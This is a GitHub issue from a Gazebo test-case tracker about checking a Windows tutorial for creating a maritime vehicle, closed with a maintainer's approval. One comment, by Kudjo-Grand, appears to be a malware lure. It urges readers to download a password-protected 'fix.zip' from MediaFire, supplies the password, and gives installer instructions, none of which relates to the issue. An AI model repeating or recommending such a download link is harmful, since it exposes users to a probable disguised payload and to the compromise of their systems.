gazebosim/gazebo_test_cases #1159: gz-sim: Create a maritime vehicle

azeey-test, 2024-08-29:
## Configuration

* os: Windows

## Links

* [Live](https://gazebosim.org/api/sim/9/create_vehicle.html)
* [Source](https://github.com/gazebosim/gz-sim/tree/gz-sim9/tutorials/create_vehicle.md)

## Process

    
            
### Step 1 - Instructions work
            
        

    
    

    

    
    
            
### Step 2 - Images (if there are any) match the result

Kudjo-Grand, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

knmcguire, 2024-09-13:
I'll be working on this now

knmcguire, 2024-09-13:
All good! ✅ 

[image]

Just a nitpick that I was missing what the next steps of this tutorial are but I'm assuming it is in preperation for another maritime tutorial?